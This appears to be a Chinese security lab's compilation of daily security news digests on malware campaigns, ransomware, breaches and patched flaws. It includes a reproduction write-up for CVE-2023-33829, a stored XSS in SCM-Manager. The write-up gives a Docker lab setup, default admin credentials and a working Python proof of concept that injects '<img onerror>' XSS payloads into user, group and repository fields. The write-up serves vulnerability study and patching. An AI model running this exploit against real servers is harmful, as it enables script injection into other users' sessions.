Stealer是一款新型的信息窃取程序，它可以从多种网络浏览器、FTP客户端、电子邮件客户端和加密货币钱包应用中窃取存储的凭证、Cookie和信用卡信息，并通过Telegram将窃取的信息发送给远程服务器。 6、KeePass v2.54修复了泄露明文主密码的漏洞 https://keepass.info/news/n230603_2.54.html KeePass发布了2.54版本，修复了允许从应用程序内存中提取明文主密码的CVE-2023-32784漏洞。该漏洞于5月18日被一位名为vdohney的安全研究员披露，并在GitHub上发布了一个证明概念工具。 7、尽快更新！苹果iTunes出现漏洞，威胁Windows电脑安全 https://www.freebuf.com/news/368603.html 苹果公司的iTunes在微软Windows系统上使用时存在一个安全漏洞，可能使攻击者劫持受影响设备的操作系统。虽然目前苹果已经打上了补丁，但该漏洞已经存在了六个月之久。 8、 Xplain黑客攻击影响了瑞士州警察和Fedpol https://securityaffairs.com/147047/data-breach/fedpol-swiss-police-cyber-attack.html 瑞士警方对伯尔尼IT公司Xplain的网络攻击展开了调查，该公司为几个联邦和州政府部门，军队，海关和联邦警察局（Fedpol）提供服务。瑞士报纸Le Temps周六首次报道了袭击的消息。 9、FTC对亚马逊Alexa和Ring的隐私侵权行为处以3080万美元罚款 https://thehackernews.com/2023/06/ftc-slams-amazon-with-308m-fine-for.html 美国联邦贸易委员会（FTC）对亚马逊旗下的Alexa语音助手和Ring（智能门铃）安全摄像头的一系列隐私问题累计罚款3080万美元。其中包括对违反儿童隐私法的2500万美元的罚款，因为他们永久保存了Alexa的语音记录，并阻止父母进行删除。 10、P0级故障！唯品会 329 宕机事件相关负责人被开除 https://www.freebuf.com/news/368599.html 6 月 5 日，唯品会发布《关于 329 机房宕机故障处理的公告》，宣布了 3 月 29 日唯品会宕机事件的最终处理结果，将 3 月 29 日发生的机房宕机故障判定为 P0 级故障，并开除了平台部相关负责人。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

一、漏洞描述 漏洞简述 SCM-Manager 是一款开源的版本库管理软件，同时支持 subversion、mercurial、git 的版本库管理。安装简单，功能较强，提供用户、用户组的权限管理 ，有丰富的插件支持。由于在MIT的许可下是开源的，因此它允许被用于商业用途，而且其代码可以在GitHub上获取到。该项目最初只是被用于研究目的，而在其2.0版本之后，被Cloudogu公司接手管理和开发了其各种代码库，以便为各个公司提供专业的企业级支持。 该漏洞主要为攻击者利用其多个功能的描述字段的代码缺陷，构造payload进行XSS攻击。 漏洞影响范围 供应商：Cloudogu 产品：SCM Manager 确认受影响版本：SCM Manager 1.2 <= 1.60 修复版本：>1.60 最新版本为2.43.1 二、漏洞复现实战 环境搭建 docker镜像： https://bitbucket.org/sdorra/docker-scm-manager/src/master/利用shell脚本搭建 shell: #!/bin/bash mkdir /var/lib/scm chown 1000:1000 /var/lib/scm docker run -v /var/lib/scm:/var/lib/scm -p 8080:8080 sdorra/scm-manager 漏洞复现 首先访问SCM Manager，需身份认证 Username : scmadmin Password: scmadmin repositories repository功能下Description字段该漏洞可利用 创建新repository，并payload进行利用 Git类型： Subversion类型： Users User功能下Display Name字段该漏洞可利用 创建新repository，并payload进行利用 可以看到新创建的账号中Display Name属性下显示异常，且XSS payload利用成功 Groups Group功能下Description字段该漏洞可利用 另外可以根据POC进行利用 POC： import requests import argparse import sys # Main menu parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit') parser.add_argument("-u", "--user", help="Admin user or user with write permissions") parser.add_argument("-p", "--password", help="password of the user") args = parser.parse_args() # Credentials user = sys.argv[2] password = sys.argv[4] # Global Variables main_url = "http://localhost:8080/scm" # Change URL if its necessary auth_url = main_url + "/api/rest/authentication/login.json" users = main_url + "/api/rest/users.json" groups = main_url + "/api/rest/groups.json" repos = main_url + "/api/rest/repositories.json" # Create a session session = requests.Session() # Credentials to send post_data={  'username': user, # change if you have any other user with write permissions  'password': password # change if you have any other user with write permissions } r = session.post(auth_url, data=post_data) if r.status_code == 200:  print("[+] Authentication successfully") else:  print("[-] Failed to authenticate")  sys.exit(1) new_user={  "name": "newUser",  "displayName": "<img src=x onerror=alert('XSS')>",  "mail": "",  "password": "",  "admin": False,  "active": True,  "type": "xml" } create_user = session.post(users, json=new_user) print("[+] User with XSS Payload created") new_group={  "name": "newGroup",  "description": "<img src=x onerror=alert('XSS')>",  "type": "xml" } create_group = session.post(groups, json=new_group) print("[+] Group with XSS Payload created") new_repo={  "name": "newRepo",  "type": "svn",  "contact": "",  "description": "<img src=x onerror=alert('XSS')>",  "public": False } create_repo = session.post(repos, json=new_repo) print("[+] Repository with XSS Payload created") 漏洞修复 建议更新至SCM Manager最新版本，目前为2.43.1 结束语 本文主要介绍了CVE-2023-33829 SCM Manager XSS漏洞复现过程，漏洞主要体现于攻击者利用其多个功能的描述字段的代码缺陷，构造payload进行XSS攻击。 本漏洞可参考之处为敏感功能避免重复调用非敏感功能代码，并做好过滤与校验，进行必要的安全测试。

1、在线卖家遭受新型窃取信息恶意软件攻击 https://www.bleepingcomputer.com/news/security/online-sellers-targeted-by-new-information-stealing-malware-campaign/ 一种名为Vidar的窃取信息恶意软件正在通过一场新的网络攻击，针对在线卖家，以窃取他们的凭证，从而进行更有破坏性的攻击。这场新的攻击于本周开始，攻击者通过电子邮件和网站联系表单，向网店管理员发送投诉。这些电子邮件假装是网店的客户，称他们在下单时遇到了错误，但银行账户却被扣除了550美元。 2、微软将于2023年底停止支持Windows上的Cortana https://www.bleepingcomputer.com/news/microsoft/microsoft-is-killing-cortana-on-windows-starting-late-2023/ 微软宣布，将于2023年底停止支持Windows上的Cortana应用。 3、Windows 11将默认要求SMB签名以防止NTLM中继攻击 https://blogs.windows.com/windows-insider/2023/06/02/announcing-windows-11-insider-preview-build-25381/ 微软表示，为了防止NTLM中继攻击，从6月2日开始向Canary Channel内部人员推送的Windows版本开始，将默认要求所有连接使用SMB签名(又称安全签名)。 4、BlackSuit与Royal勒索软件存在高度相似性 https://www.trendmicro.com/en_us/research/23/e/investigating-blacksuit-ransomwares-similarities-to-royal.html BlackSuit是一种新出现的勒索软件，可以同时针对Windows和Linux用户。它在加密文件后添加blacksuit扩展名，并在目录中放置赎金说明，要求受害者访问其TOR聊天网站并支付赎金。 5、Zyxel发布防火墙加固指南以修复命令注入漏洞 https://www.zyxel.com/global/en/support/security-advisories/zyxels-guidance-for-the-recent-attacks-on-the-zywall-devices Zyxel是一家网络设备制造商，其防火墙产品存在一个操作系统命令注入漏洞，该漏洞由TRAPA Security发现，并被赋予CVE-2023-28771编号。该漏洞利用防火墙版本中错误消息处理的不当，允许未经身份验证的攻击者通过向受影响的设备发送特制的数据包，远程执行一些操作系统命令。 6、VMware揭秘TrueBot僵尸网络的攻击手法 https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html 近日，VMware安全研究人员揭秘了一个名为TrueBot的僵尸网络的攻击手法。TrueBot是一个由Silence组织开发的下载器木马，利用Netwrix漏洞传播，可以收集被感染系统的信息，并作为进一步攻击的跳板。 7、CMDStealer利用CMD脚本和LOLBaS窃取网银信息 https://blogs.blackberry.com/en/2023/05/cmdstealer-targets-portugal-peru-and-mexico 研究人员揭露了一个名为CMDStealer的金融诈骗活动。CMDStealer是由一个不知名的巴西威胁行为者发起的攻击，目标是窃取西班牙语和葡萄牙语的网银用户的账号信息。受害者主要分布在葡萄牙、墨西哥和秘鲁。 8、NoEscape勒索软件利用反射式DLL注入技术 https://blog.cyble.com/2023/06/04/evasive-noescape-ransomware-uses-reflective-dll-injection/ NoEscape是一种新型的勒索软件即服务(RaaS)，于2023年5月底在一个网络犯罪论坛上推出，招募合作伙伴进行分发。NoEscape可以生成多种类型的可执行文件，针对Windows 7及以上版本、Windows XP、Linux/ESXi服务器等系统。 9、Atomic Wallet遭黑客攻击，超过3500万美元的加密货币被盗 https://www.bleepingcomputer.com/news/security/atomic-wallet-hacks-lead-to-over-35-million-in-crypto-stolen/ Atomic Wallet是一种移动和桌面端的加密货币钱包，可以存储多种加密货币。该钱包支持多个操作系统，包括Windows、Android、iOS、macOS和Linux。2023年6月3日，Atomic Wallet在推特上表示，他们收到了用户钱包被入侵的报告，并开始调查这一问题。 10、新型Magecart攻击利用合法域名隐藏身份 https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains 研究人员发现并分析了一种新的持续进行的Magecart风格的网络攻击，旨在从电子商务网站窃取个人身份信息和信用卡信息。受害者分布在北美、拉丁美洲和欧洲，规模不一。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、Kimsuky组织模仿关键人物进行针对性网络攻击 https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3413621/us-rok-agencies-alert-dprk-cyber-actors-impersonating-targets-to-collect-intell/ 美国和韩国的网络安全和情报机构联合发布了一份关于朝鲜网络攻击者的警告，指出他们模仿关键人物进行针对性网络攻击。这些攻击者属于朝鲜的APT组织Kimsuky(又称APT43)，他们利用钓鱼邮件和伪造的网站来诱使目标输入自己的凭证，然后利用这些凭证来访问目 2、MOVEit Transfer遭遇零日漏洞攻击 https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023 Progress Software公司的MOVEit Transfer管理文件传输应用存在一个严重的漏洞，该漏洞已经被黑客广泛利用来控制脆弱的系统。该漏洞尚未被分配一个CVE编号，涉及一个SQL注入漏洞，允许未经授权的访问和提升权限。该漏洞影响了MOVEit Transfer 2021.1.0.0版本及以下版本，该应用被广泛用于在组织内部和外部安全地传输敏感数据。Progress Software公司已经发布了一个 3、恶意PyPI包混合源代码和编译代码来躲避安全检测 https://www.reversinglabs.com/blog/when-python-bytecode-bites-back-who-checks-the-contents-of-compiled-python-files 研究人员在Python Package Index(PyPI)中发现了一种新颖的攻击，利用编译后的Python代码来逃避检测。这可能是第一种利用Python字节码(PYC)文件可以直接执行的事实来发动供应链攻击的例子，并且是在PyPI中恶意提交激增的背景下发生的。如果是这样，它将带来另一种供应链风险，因为这种攻击很可能会被大多数只扫描Python源代码(PY)文件 4、Qakbot恶意软件利用住宅IP进行动态攻击 https://blog.lumen.com/qakbot-retool-reinfect-recycle/ Qakbot是一种银行木马，也被称为Pinkslipbot或Qbot，最早出现于2007年，主要通过电子邮件劫持和社会工程学来传播，并感染Windows主机。这个僵尸网络采用了一些技术来隐藏其基础设施，例如使用住宅IP地址和感染的Web服务器，而不是使用托管的虚拟专用服务器(VPS)网络。Qakbot根据安全策略的收紧和防御的演变，不断改变其初始入侵的方式。研究人员跟踪了Qakbot最近的活动，观察了其网络结构，并获得了一些关于支持Qakbot作为一种逃避式和顽固威胁的方法的关键见解 5、研究人员披露Tron零日漏洞发现和验证细节 https://0d.dwalletlabs.com/game-of-tron-critical-0-day-in-tron-multi-signature-wallets-2c3e90668dc0 研究人员发现了一个影响Tron多重签名账户的严重零日漏洞，该漏洞可能导致超过5亿美元的数字资产面临风险。该漏洞涉及一个SQL注入漏洞，允许攻击者在没有任何验证的情况下访问和修改多重签名账户的数据，包括增加或删除签名者、更改阈值、转移资金等。该漏洞影响了Tron 4.1.2版本及以下版本，该版本于2021年9月发布。研究人员在2021年2月通过一个漏洞赏金计划向Tron报告了该漏洞，并在几天内得到 6、MOVEit Transfer中的零日漏洞被用于数据窃取 https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft 研究人员披露了Progress Software的托管文件传输产品MOVEit Transfer中存在一个零日漏洞，该漏洞已被分配CVE-2023-34362，并被广泛利用来部署网络后门和窃取数据。研究人员表示，这个漏洞最早在5月27日被利用，导致网络后门的部署和数据的窃取。 7、DogeRAT 恶意软件针对银行和娱乐行业 https://cyware.com/news/dogerat-malware-eyes-banking-and-entertainment-sectors-a720b704 发现了一种新的Android恶意软件威胁，主要针对印度的用户。该恶意软件名为DogeRAT，通过伪装成Opera Mini，OpenAI ChatGPT以及Netflix和YouTube高级版本的社交媒体和消息传递平台进行分发。 8、威胁行为者可以从Google云端硬盘中窃取数据而不会留下痕迹 https://www.helpnetsecurity.com/2023/06/01/data-exfiltration-google-drive/ Mitiga研究人员说，Google Workspace（以前称为G Suite）有一个弱点，可以防止恶意的外部人员或内部人员从Google云端硬盘发现数据泄露。 9、Splunk Enterprise修补了一个高严重性漏洞 https://www.securityweek.com/high-severity-vulnerabilities-patched-in-splunk-enterprise 其中最严重的是 CVE-2023-32707，这是一个权限提升问题，允许具有“edit_user”功能的低特权用户通过特制的 Web 请求将权限提升给管理员。 10、6月1日起，谷歌对Chrome的沙盒逃逸漏洞的奖金增加三倍 https://www.freebuf.com/news/368272.html 谷歌6月1日宣布，对其Chrome网络浏览器的沙盒逃逸链漏洞的奖励增加三倍，直至2023年12月1日。该公司的这一举措旨在鼓励安全研究人员识别和报告可能破坏Chrome浏览器安全机制的漏洞，最终帮助该软件增强抵御攻击的整体弹性。Chrome浏览器漏洞奖励计划的奖金从6月1日开始生效，只适用于首个功能性全链漏洞。通过提交一个全链漏洞，参与者可以获得高达18万美元的奖励，同时也有可能再获得其他奖金，而在六个月的窗口期提交的其他漏洞，最高可获得12万美元的奖励。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。